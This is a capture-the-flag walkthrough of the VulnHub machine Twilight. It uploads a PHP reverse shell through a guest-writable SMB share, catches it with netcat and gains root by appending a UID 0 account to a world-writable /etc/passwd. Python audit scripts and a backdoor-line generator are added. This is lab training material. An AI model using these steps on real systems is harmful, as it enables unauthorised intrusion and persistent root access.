[VULNHUB] TWILIGHT

Today we are going to hack the Vulnhub machine called Twilight. You can download it from the following link: https://www.vulnhub.com/entry/sunset-twilight,512/
  • Enumeration
    We start with an nmap scan of all TCP ports to see which services are exposed.
    ~ > nmap -A -p- 192.168.1.59
    Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-27 02:19 CEST
    Nmap scan report for twilight.home (192.168.1.59)
    Host is up (0.00032s latency).
    Not shown: 65526 closed ports
    PORT     STATE SERVICE     VERSION
    22/tcp   open  ssh         OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
    | ssh-hostkey:
    |   2048 43:e9:45:ec:f4:5b:ed:e9:64:47:43:43:39:96:9d:c9 (RSA)
    |   256 ed:67:ad:31:04:17:ef:cf:75:02:05:db:88:94:97:a0 (ECDSA)
    |_  256 ed:41:e5:d1:b2:23:2c:d5:90:59:2a:37:8b:da:31:c1 (ED25519)
    25/tcp   open  smtp        Exim smtpd
    | smtp-commands: twilight Hello twilight.home [192.168.1.111], SIZE 52428800, 8BITMIME, PIPELINING, CHUNKING, PRDR, HELP,
    |_ Commands supported: AUTH HELO EHLO MAIL RCPT DATA BDAT NOOP QUIT RSET HELP
    80/tcp   open  http        Apache httpd 2.4.38 ((Debian))
    |_http-server-header: Apache/2.4.38 (Debian)
    |_http-title: Site doesn't have a title (text/html; charset=UTF-8).
    139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
    445/tcp  open  netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
    2121/tcp open  ftp         pyftpdlib 1.5.6
    | ftp-anon: Anonymous FTP login allowed (FTP code 230)
    |_-rw-r--r--   1 root     root           35 Jul 16 12:21 22253251-65325.twilight
    | ftp-syst:
    |   STAT:
    | FTP server status:
    |  Connected to: 192.168.1.59:2121
    |  Waiting for username.
    |  TYPE: ASCII; STRUcture: File; MODE: Stream
    |  Data connection closed.
    |_End of status.
    3306/tcp open  mysql       MySQL 5.5.5-10.3.22-MariaDB-0+deb10u1
    | mysql-info:
    |   Protocol: 10
    |   Version: 5.5.5-10.3.22-MariaDB-0+deb10u1
    |   Thread ID: 39
    |   Capabilities flags: 63486
    |   Some Capabilities: LongColumnFlag, Support41Auth, ConnectWithDatabase, IgnoreSpaceBeforeParenthesis, Speaks41ProtocolOld, DontAllowDatabaseTableColumn, SupportsTransactions, InteractiveClient, Speaks41ProtocolNew, FoundRows, SupportsCompression, IgnoreSigpipes, ODBCClient, SupportsLoadDataLocal, SupportsMultipleResults, SupportsMultipleStatments, SupportsAuthPlugins
    |   Status: Autocommit
    |_  Salt: P8cjiTFC]*X]K@

    Host script results:
    NetBIOS MAC: (unknown)
    | smb-os-discovery:
    |   OS: Windows 6.1 (Samba 4.9.5-Debian)
    |   Computer name: twilight
    |   NetBIOS computer name: TWILIGHT\x00
    |   Domain name: \x00
    |   FQDN: twilight
    |_  System time: 2020-07-27T16:20:15-04:00
    | smb-security-mode:
    |   account_used: guest
    |   authentication_level: user
    |   challenge_response: supported
    |_  message_signing: disabled (dangerous, but default)
    | smb2-security-mode:
    |   2.02:
    |_    Message signing enabled but not required
    | smb2-time:
    |   date: 2020-07-27T20:20:14
    |_  start_date: N/A

    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    After skimming all the services, we take a closer look at Samba. Note that smb-security-mode reports account_used: guest, so the server accepted a null session; we list the shares to see whether any of them is interesting.
    ~ > smbclient -L 192.168.1.59
    Enter WORKGROUP\sml's password:

        Sharename       Type      Comment
        ---------       ----      -------
        WRKSHARE        Disk      Workplace Share. Do not access if not an employee.
        print$          Disk      Printer Drivers
        IPC$            IPC       IPC Service (Samba 4.9.5-Debian)
    SMB1 disabled -- no workgroup available
    We see the WRKSHARE share, so we connect to it.
    ~ > smbclient \\\\192.168.1.59\\WRKSHARE
    Enter WORKGROUP\sml's password:
    Try "help" to get a list of possible commands.
    smb: \>
    Running "dir" shows that the share is the root of the target's filesystem. If we change into /var/www/html we see the same files that are served on port 80 :) With that in mind, we prepare a PHP reverse shell: anything we can write into that directory will be executed by Apache when we request it.
    ~ > cp /usr/share/webshells/php/php-reverse-shell.php .
    ~ > mv php-reverse-shell.php rshell.php
    ~ > nano rshell.php   # set $ip to our attacking machine's address (the default $port, 1234, matches the listener below)
    Once it is ready, we upload it!
    smb: \var\www\html\> put rshell.php
    putting file rshell.php as \var\www\html\rshell.php (2683,0 kb/s) (average 1085,9 kb/s)
    smb: \var\www\html\>
    We start a netcat listener on port 1234.
    ~ > nc -nlvp 1234
    listening on [any] 1234 ...
    Then we visit http://192.168.1.59/rshell.php to trigger it.
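    The foothold works because WRKSHARE exports the whole filesystem, including /var/www/html, and lets an unauthenticated client write to it. The following Python is an added example, not part of the original writeup: it audits an smb.conf for exactly that pattern (shares whose path contains the web root, shares that are writable, and shares that accept guests). The smb.conf fragment is constructed for the example; only the share names and comments come from the smbclient -L output above, while the path and permission settings are assumptions, since the writeup does not show the machine's configuration.

```python
import configparser
import posixpath

# Constructed smb.conf fragment (assumption: the real Twilight config is not shown
# in the writeup). Share names and comments match the `smbclient -L` listing.
SAMPLE_SMB_CONF = """
[global]
   workgroup = WORKGROUP
   map to guest = Bad User

[WRKSHARE]
   comment = Workplace Share. Do not access if not an employee.
   path = /
   browseable = yes
   writable = yes
   guest ok = yes

[print$]
   comment = Printer Drivers
   path = /var/lib/samba/printers
   browseable = yes
   read only = yes
   guest ok = no
"""

_YES = {"yes", "true", "1"}


def _flag(section, *names, default=False):
    """Read a Samba boolean option; Samba accepts several synonyms, first present wins."""
    for name in names:
        if name in section:
            return section[name].strip().lower() in _YES
    return default


def audit_smb_conf(text, webroot="/var/www/html"):
    """Return findings for shares that expose, or allow writes into, the web root."""
    cfg = configparser.ConfigParser(interpolation=None, strict=False,
                                    empty_lines_in_values=False,
                                    inline_comment_prefixes=("#", ";"))
    cfg.read_string(text)
    findings = []
    for name in cfg.sections():
        if name.lower() in ("global", "homes", "printers"):
            continue
        sec = cfg[name]
        # 'read only' (default yes) and 'writable'/'writeable' are inverse synonyms in Samba.
        if "read only" in sec:
            writable = not _flag(sec, "read only")
        else:
            writable = _flag(sec, "writable", "writeable")
        guest = _flag(sec, "guest ok", "public")
        raw_path = (sec.get("path") or "").strip()
        path = posixpath.normpath(raw_path) if raw_path.startswith("/") else None
        # The share covers the web root when its path is an ancestor of (or equal to) it.
        covers_webroot = path is not None and posixpath.commonpath([path, webroot]) == path
        if path == "/":
            findings.append(f"{name}: exports the filesystem root")
        elif covers_webroot:
            findings.append(f"{name}: exports {path}, which contains the web root {webroot}")
        if writable and guest:
            findings.append(f"{name}: writable by unauthenticated guests")
        if writable and covers_webroot:
            findings.append(f"{name}: uploads land under {webroot} and are served by the web server")
    return findings


if __name__ == "__main__":
    for finding in audit_smb_conf(SAMPLE_SMB_CONF):
        print(finding)
```

    On the constructed config the audit reports WRKSHARE three times (filesystem root, guest-writable, covers the web root) and nothing for print$. Run it against /etc/samba/smb.conf on a real host; a clean result for a share still says nothing about filesystem permissions under its path, so pair it with a check of who owns the web root.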
  • Low Shell
    The listener receives a shell as www-data, which we upgrade to a pty:
    ~ > nc -nlvp 1234
    listening on [any] 1234 ...
    connect to [192.168.1.111] from (UNKNOWN) [192.168.1.70] 59268
    Linux twilight 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64 GNU/Linux
     10:51:53 up 4 min,  0 users,  load average: 0.00, 0.00, 0.00
    USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
    uid=33(www-data) gid=33(www-data) groups=33(www-data)
    /bin/sh: 0: can't access tty; job control turned off
    $ python -c 'import pty; pty.spawn("/bin/bash")'
    www-data@twilight:/$
  • Privilege Escalation
    While exploring the system we notice that /etc/passwd is world-writable:
    www-data@twilight:/$ ls -l /etc/passwd
    -rwxrwxrwx 1 root root 1594 Jul 16 09:34 /etc/passwd
    Since anyone can append to it, we add a new account with UID 0 to /etc/passwd. First we generate a password hash (for the password 123) on our own machine:
    ~ > openssl passwd -1 -salt new 123
    $1$new$p7ptkEKU1HnaHpRtzNizS1
    We append the user "lacashita" with UID 0 and GID 0 (i.e. root) and the hash we just generated to /etc/passwd. The hash goes directly in the second field, so login never consults /etc/shadow for this account.
    www-data@twilight:/$ echo "lacashita:\$1\$new\$p7ptkEKU1HnaHpRtzNizS1:0:0:ruut:/root:/bin/bash" >> /etc/passwd
    Now we switch to the new user:
    www-data@twilight:/$ su lacashita
    Password: 123
    root@twilight:/# id
    uid=0(root) gid=0(root) groups=0(root)
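    As an added example, not code from the original writeup: the MD5-crypt hash that openssl passwd -1 produced above, reimplemented in Python so the passwd line can be generated or verified without openssl, together with the check a defender would run to catch this exact backdoor (extra UID 0 accounts, hashes stored directly in /etc/passwd instead of /etc/shadow, and a passwd file writable by group or others). The sample passwd content is constructed for the example; the only values taken from the writeup are the user name, the salt, the password and the resulting hash.

```python
import hashlib

# crypt(3)'s own base64 alphabet, emitted least-significant 6 bits first.
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _to64(value, count):
    out = []
    for _ in range(count):
        out.append(ITOA64[value & 0x3F])
        value >>= 6
    return "".join(out)


def md5_crypt(password, salt):
    """MD5-crypt ($1$), the algorithm behind `openssl passwd -1 -salt <salt> <pw>`."""
    pw = password.encode()
    salt = salt[:8].encode()  # at most 8 salt characters are used
    magic = b"$1$"

    # Alternate sum md5(pw + salt + pw), mixed in len(pw) bytes at a time.
    alt = hashlib.md5(pw + salt + pw).digest()
    ctx = hashlib.md5(pw + magic + salt)
    remaining = len(pw)
    while remaining > 0:
        ctx.update(alt[:min(16, remaining)])
        remaining -= 16
    # One byte per bit of len(pw): NUL for a 1 bit, the first password byte for a 0 bit.
    bits = len(pw)
    while bits:
        ctx.update(b"\x00" if bits & 1 else pw[:1])
        bits >>= 1
    final = ctx.digest()

    # 1000 stretching rounds with the fixed mixing pattern of the original algorithm.
    for i in range(1000):
        ctx1 = hashlib.md5()
        ctx1.update(pw if i & 1 else final)
        if i % 3:
            ctx1.update(salt)
        if i % 7:
            ctx1.update(pw)
        ctx1.update(final if i & 1 else pw)
        final = ctx1.digest()

    f = final
    encoded = (
        _to64((f[0] << 16) | (f[6] << 8) | f[12], 4)
        + _to64((f[1] << 16) | (f[7] << 8) | f[13], 4)
        + _to64((f[2] << 16) | (f[8] << 8) | f[14], 4)
        + _to64((f[3] << 16) | (f[9] << 8) | f[15], 4)
        + _to64((f[4] << 16) | (f[10] << 8) | f[5], 4)
        + _to64(f[11], 2)
    )
    return "$1$" + salt.decode() + "$" + encoded


def backdoor_line(user, password, salt="new", home="/root", shell="/bin/bash"):
    """The /etc/passwd entry appended in the writeup: UID 0 / GID 0 with the hash inline."""
    return f"{user}:{md5_crypt(password, salt)}:0:0:{user}:{home}:{shell}"


def audit_passwd(text, mode=0o644):
    """Findings a defender wants from a passwd file's content and its permission bits."""
    findings = []
    if mode & 0o022:
        findings.append("passwd is writable by group or others (mode %o)" % mode)
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append(f"line {lineno}: malformed entry ({len(fields)} fields)")
            continue
        name, pw, uid = fields[0], fields[1], fields[2]
        if uid == "0" and name != "root":
            findings.append(f"line {lineno}: extra UID 0 account '{name}'")
        if pw == "":
            findings.append(f"line {lineno}: empty password for '{name}'")
        elif pw not in ("x", "*", "!", "!!"):
            findings.append(f"line {lineno}: hash stored in passwd for '{name}'")
    return findings


# Constructed sample: a trimmed passwd with the writeup's backdoor line appended.
SAMPLE_PASSWD = "\n".join([
    "root:x:0:0:root:/root:/bin/bash",
    "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin",
    "www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin",
    backdoor_line("lacashita", "123"),
])

if __name__ == "__main__":
    print(backdoor_line("lacashita", "123"))
    for finding in audit_passwd(SAMPLE_PASSWD, mode=0o777):
        print(finding)
```

    md5_crypt("123", "new") reproduces the hash shown above, so the same function can be used to confirm a suspicious passwd entry offline. On a live system feed audit_passwd the file contents and os.stat("/etc/passwd").st_mode & 0o777; the three findings it raises here (writable file, extra UID 0, inline hash) are each sufficient on their own to treat the host as compromised.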
  • root.txt
    root@twilight:/# cd /root
    root@twilight:~# ls
    root.txt
    root@twilight:~# cat root.txt
      (\
      \'\
       \'\     __________
       / '|   ()_________)
       \ '/    \ ~~~~~~~~ \
         \       \ ~~~~~~   \
         ==).      \__________\
        (__)       ()__________)

    34d3ecb1bbd092bcb87954cee55d88d3

    Thanks for playing!
    - Felipe Winsnes (@whitecr0wz)
    root@twilight:~#
  • End
    And with that we are root on the machine.